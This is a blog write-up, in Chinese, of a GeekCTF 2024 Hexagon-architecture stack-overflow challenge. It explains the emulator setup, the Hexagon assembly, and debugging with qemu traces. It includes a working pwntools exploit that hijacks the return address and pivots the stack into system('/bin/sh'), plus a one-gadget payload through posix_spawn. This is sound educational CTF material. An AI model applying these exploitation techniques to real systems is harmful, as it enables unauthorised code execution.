『2024GeekCTF』stkbof-初识hexagon架构

非常好架构，使我的IDA旋转

前言

最近在找点新的东西学，翻着翻着找到这道题，稀罕物，所以想着学一学。hexagon架构的pwn题很少见，网上资料也很少，好在题目附件给了源码，可以对照着汇编来学习，类比一下应该不算太难学。网上关于这道题的解析也是少之又少，就算有也很不详细。

环境准备

省流

一共需要准备两样东西：IDA对于hexagon架构处理器反编译的插件和qemu-hexagon，将题目给出的libc.so软链接到/lib目录下作ld。

IDA的hexagon反编译插件

插件很好找：hexagon架构处理器反编译的插件，解压之后dll放到IDA8.3（及以下版本）的procs文件夹内即可。需要注意的是这个程序是32位的，这个插件也只为32位服务，因此尽管是8.3版本，也要单独打开IDA.exe才能识别到这个hexagon的插件。

qemu-hexagon

qemu这里就比较难受了。qemu-user就不用说了肯定得有的，但是实际运行之后发现还少点东西：

1	qemu-hexagon: Could not open '/lib/ld-musl-hexagon.so.1': No such file or directory

本来我想仿照arm或者mips架构去找gnu包下载，忽然想到不对劲，高通本身就有一套sdk，没道理继续使用gcc的。事实就是在ubuntu中用apt search了一下hexagon，确实就没几个相关的包。然后去quic（高通的github）翻了一会，找到了hexagon的toolchain，release中有针对x86_64linux量身打造的hexagon musl前后端编译工具。5.9G，没办法那也得下下来看看是不是真的能派上用场。然后这玩意解压出来有50个G……在target/lib文件夹下可以找到ld-musl-hexagon.so.1，把他cp到/lib里，然后程序终于可以运行了。。。然后后面发现泄露出来的libc地址怎么也和题目给出来的libc.so的偏移对不上号。如果把解压出来的libc.so替换附件给的libc那就没问题了，所以怀疑是ld和libc版本不一样（因为我下载的是最新版的release）。然后我发现解压的文件中libc和ld文件大小一样，计算发现md5值也是一样的，这也就意味着我只要把libc.so软链接到lib文件夹就可以了，根本不用去下载toolchain。

1	ln -sf /path/to/your/libc.so /lib/ld-musl-hexagon.so.1

Docker的拉取问题

在解决这个问题之后，我们先来说说dockerfile的问题。这道题给的docker使用fedora构建，但是构建的时候元数据可以下载下来，但是主要的包却死活拉不下来。解决办法是，从dockerhub的标签进到github仓库，找到这个包然后通过浏览器下载下来，与它在同一目录下的dockerfile也下载下来，然后在本地利用这个dockerfile构建fedora的镜像。这样一来，其他使用fedora:39的docker就可以直接从本地拉取。

部分汇编解析

还是老样子，几乎找不到资料，好在题目给出了源码，我们可以结合源码分析汇编指令。虽然有点小题大做，但是网上可以下载到高通的开发者手册。这个开发者手册可以解决一些网上很难获得答案的问题。

装好插件之后打开IDA，发现hexagon的指令风格一眼看过去和arm非常像，所以就算不用找开发手册其实也能看个大概。

mewm()类似于x86汇编中的[]，解引用。后面那个m有可能是h，代表halfword；d表示doubleword…
{}括起来的语句会被并发执行，hexagon最多支持四指令并发
一共有32个32位通用寄存器，R0-R31。存在寄存器对，可以当做64位寄存器使用，如R0和R1可以合并成R1:0（R1和R2不行）。这个很有意思。
R29-R31是别名寄存器。R29是SP，R30是FP，R31是LR寄存器。如果接触过ARM汇编的话，这下你就该感叹：这下看懂了。SP是栈顶寄存器，FP是栈（底）寄存器，LR是储存返回地址的寄存器。
有32个控制寄存器，我们需要重点关注的是PC寄存器（别名C9）和LC、SA系列寄存器。后者是拿来给硬件循环计数用的。
栈结构与我们熟知的x86、arm没什么区别。但是开辟栈和销毁的方式不太一样。有类似canary的保护机制，还有加密返回地址的保护机制，key是存在专门的寄存器里面的。不过这道题没有涉及。
hexagon用allocframe开辟栈帧：LR压栈，FP压栈，SP减去一定数值向低地址开辟，FP设置成指向旧FP的指针。deallocframe/dealloc_return用于销毁栈帧/销毁栈帧并返回，从栈底取回FP和LR。说白了就是和x86或者arm一样的。
立即数和一些存放数据的寄存器前面会加一些井号，##表示必须用32位偏移量，#是必须不能用32位偏移量，没加井号意味着必要时才用32为偏移量。
函数传参按照寄存器编号顺序来使用，例如有四个参数就用R0-R3寄存器。

hexagon栈结构

hexagon栈开辟与销毁

题目分析&动调

qemu-hexagon调试方法

先讲讲动调的问题。原本我尝试使用gdb-multiarch来调试，但是发现无论如何都会报错，估计是gdb-multiarch的问题，应该是有解决办法的但暂时懒得管了，先放一边。

**
ERROR:../../target/hexagon/gdbstub.c:33:hexagon_gdb_read_register: code should not be reached
Bail out! ERROR:../../target/hexagon/gdbstub.c:33:hexagon_gdb_read_register: code should not be reached
Segmentation fault (core dumped)

翻了翻qemu的文档发现qemu是可以记录一些程序运行日志的。-d参数可以选择记录的内容，-D选择log输出的文件，-dfilter约束记录的指令地址范围。

qemu翻译执行指令并不是逐条指令进行的，而是会一坨执行翻译到一个TB（translation block）中，再以TB为单位去执行。所以qemu -d记录的日志也会以TB为单位呈现。根据记录下来的日志找到的规律，TB通常会以call、return之类的跳转语句划分。简单来说就是，正常来讲我们没法看到每一步的CPU上下文情况。

但是qemu也留了一手，-d参数中加上nochain，加上-singlestep参数就能看到逐指令的上下文了，但是这样的执行速度会下降许多，如果是大型项目调试的话，并不建议这么做。这里涉及到qemu trace的原理，这里就不深入探究了，以后有机会再展开。

1	qemu-hexagon -L libc -d in_asm,exec,cpu,page,nochain -singlestep -dfilter 0x20400+0xc0 -strace -D ./log ./chall

这是我的调试运行命令，这样log日志中就会存有从0x20400到0x204c0（stkbof和main函数范围）逐行指令执行前的CPU寄存器情况，并且记录系统调用情况与其返回值。page参数会在log开头记录程序布局情况，但是有且仅能看到各地址段的权限情况，没法得知哪个段对应什么用处。

如果想调试自己的payload的，可以在脚本中写process，这样就会从脚本记录日志了。

from pwn import *

r = process(['qemu-hexagon', '-L', 'libc', '-d', 'in_asm,exec,cpu,nochain', '-singlestep',
            '-dfilter', '0x20400+0xc0', '-strace', '-D', './log', './chall'])

题目分析

题目就是给了个栈溢出可以劫持返回地址，然后我们得想办法getshell。不同于平常的题目，这道题我们看不到任何pop/push语句，也就是说我们想要传参，得考虑利用其他gadget。

泄露栈/libc地址

众所周知qemu模拟执行一般情况下并没有aslr这种东西，chall程序本身也没开PIE保护，那就意味着栈地址、libc地址我们都可以直接利用调试泄露出来，然后一直用。我们运行调试命令，程序结束后我们查看log，找到执行到stkbof的部分，可以看到一行：

1	6275 read(0,0x4080ebe0,272) = 2

这是qemu记录下来的系统调用记录，6275是进程pid，等于号后面的是这个系统调用的返回值。显而易见输入点是0x4080ebe0，这就是我们泄露出来的栈地址。请注意，不同环境下这个地址可能会改变。不同于题目运行于fedora，此log是基于ubuntu22的qemu运行的。

因为程序调用动态链接库的函数在plt和got中转一手，并且我们约束了log范围，所以仅靠此时的log没法很直观的看出来libc地址。我们注意到plt表处的指令从got表取出了解析好的libc地址，储存在r28寄存器中并jumpr执行。

.plt:00020510 // int puts(const char *s)
.plt:00020510 puts:                                   // CODE XREF: main+8C↑p
.plt:00020510                 { r14 = add(pc, ##off_405D4@pcrel) }
.plt:00020518                 { r28 = memw(r14) }
.plt:0002051C                 { jumpr r28 }
.plt:0002051C // End of function puts

那也就是说在执行puts后r28寄存器应该会残留有puts的libc地址。我们在log找到相应的位置，查看r28寄存器的值：r28 = 0x3ffa7c40，同时我们看到libc.so中puts函数的偏移是0xD7C40，那么就可以得到libc的基址是0x3FED0000。

传参

有了libc地址，system和binsh地址都会有了，现在要考虑如何给system传参。这里没有pop R0这样的gadget，只有给R0赋值的语句，考虑通过栈迁移的方式，利用栈给寄存器传参。0x204b4处有个取FP-8处数据赋值给R0的指令，并且紧接着就是return（插播一句，估计这个地方原本是利用R0作为函数返回值传参寄存器了）。return之后，程序会继续从新FP+4的位置开始执行。因此有以下思路：

劫持FP为0x4080ebe0（输入点），LR为ret，那么接下来程序会从0x4080ebe4开始执行。并且因为刚才总共是执行了两次return，所以此时FP应该是0x4080ebe0内的数据。
因为我们需要从FP-8来取值，因此我们需要控制FP为栈地址。这里写0x4080ebe0+0x10，那么0x4080ebe0+0x10-0x8处要写binsh的libc地址。
又一次return后，程序将从0x4080ebe0+0x14处执行，所以这个地方要写上system的libc地址。

综上可以得到payload

stack = 0x4080ebe0
libc_base = 0x3FED0000
gadget1 = 0x204b4  # { r0 = memw(fp + #var_8) } { dealloc_return }
ret = 0x2041c  # { dealloc_return }

payload = p32(stack + 0x10)
payload += p32(gadget1)
payload += p32(libc_base + next(libc.search(b'/bin/sh\x00'))) + p32(0)+p32(0)
payload += p32(libc_base + libc.symbols['system'])
payload = payload.ljust(0x100, b'\x90')
payload += p32(stack)+p32(ret)

EXP

from pwn import *

r = process(['qemu-hexagon', '-L', 'libc', '-d', 'in_asm,exec,cpu,nochain', '-singlestep',
            '-dfilter', '0x20400+0xc0', '-strace', '-D', './log', './chall'])
context(arch='amd64', os='linux', log_level='debug')
libc = ELF('./libc.so')

stack = 0x4080ebe0
libc_base = 0x3FED0000
gadget1 = 0x204b4  # { r0 = memw(fp + #var_8) } { dealloc_return }
ret = 0x2041c  # { dealloc_return }
# success(hex(libc_base+0x0012279))

payload = p32(stack + 0x10)
payload += p32(gadget1)
payload += p32(libc_base + next(libc.search(b'/bin/sh\x00'))) + p32(0)+p32(0)
payload += p32(libc_base + libc.symbols['system'])
payload = payload.ljust(0x100, b'\x90')
payload += p32(stack)+p32(ret)


r.recv()
r.send(payload)


r.interactive()

小结

从下载附件到打通题目再到写完文章，一天过去了……之前没有试过这么少资料能参考的情况，网上的wp甚至只能找到DeePunk师傅的（orz师傅tql），尽管是一道简单的栈溢出，却也要花这么多的时间才能较为完整地学习下来基础知识。实际做下来其实发现并没有那么困难，很多知识都可以迁移和类比，大概时间都花在了搭环境上。无论如何，能坚持写完这篇文章感觉真是不容易。希望我明天、后天、大后天也能有这么饱满的热情去学习新知识。

2025年的GeekCTF，会赢吗？

深入探究

更新：2024.12.13

临近期末，但是一点都不想准备。有点和这个hexagon杠上了，然后发现这个动态链接库中有ogg利用的可能性。

我们在IDA中搜索/bin/sh，可以看到有三个函数引用到这个字符串。以system函数举例：

.text:000BBA70                 { r3 = memw(fp + #var_42C) }
.text:000BBA74                 { r0 = add(pc, ##aSh@pcrel) } // "sh"
.text:000BBA7C                 { memw(fp + #var_420) = r0 }
.text:000BBA80                 { r0 = add(pc, ##aC_0@pcrel) } // "-c"
.text:000BBA88                 { memw(fp + #var_41C) = r0 }
.text:000BBA8C                 { r0 = memw(fp + #var_10) }
.text:000BBA90                 { memw(fp + #var_418) = r0 }
.text:000BBA94                 { r2 = #0 }
.text:000BBA98                 { memw(fp + #var_414) = r2 }
.text:000BBA9C                 { r0 = add(pc, ##_GLOBAL_OFFSET_TABLE_@pcrel) }
.text:000BBAA4                 { r0 = memw(r0 + ##-0x102E8) }
.text:000BBAAC                 { r5 = memw(r0) }
.text:000BBAB0                 { r1 = add(pc, ##aBinSh@pcrel) } // "/bin/sh"
.text:000BBAB8                 { r0 = add(fp, #-0x14) }
.text:000BBABC                 { r4 = add(fp, #-0x420) }
.text:000BBAC0                 { call posix_spawn }

这里取了一小部分，也就是找到的类似于ogg的位置。实际上正常system执行，会从r0寄存器接受函数参数，也就是我们想执行的命令。这个命令的地址会被储存到fp-0x10的位置。通过上面的汇编我们也不难发现，这里最后执行的是posix_spawn函数，这个函数的签名如下：

int posix_spawn(pid_t *restrict pid, const char *restrict path, const posix_spawn_file_actions_t *file_actions, const posix_spawnattr_t *restrict attrp, char *const argv[restrict], char *const envp[restrict]);

pid: 指向存储新进程 ID 的指针。
path: 要执行的程序的路径。
file_actions: 文件操作对象，用于指定子进程的文件描述符操作。可以是 NULL。
attrp: 进程属性对象，用于指定子进程的调度和信号处理等属性。可以是 NULL。
argv: 程序的参数列表（类似 exec 系列函数）。
envp: 环境变量列表（类似 exec 系列函数）。

第五个参数是我们要关注的，这个参数由r4寄存器传参。在上面的ogg中，r4被赋值为fp-0x420。其中fp-0x418处的值来自于fp-0x10。即，我们只要将传入的命令的储存地址，放到fp-0x10的位置上，这个ogg就能成功生效执行一个shell。

因此这道题的payload可以写成这样：

1 2	payload = b'sh\x00\x00'+p32(stack)*(0x100//4-1) + \ p32(stack+0x100)+p32(libc_base+0xBBA70)

不需要任何其他的gadget和寄存器操作。但是不同于glibc的ogg，这里利用还是需要传入命令参数的。换个角度想，我们可以利用这一点做到RCE。

本博客采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
因本人技术水平和知识面有限, 内容如有纰漏或者需要修正的地方, 欢迎大家指正。转载请注明来自C_LBY's blog！

Page View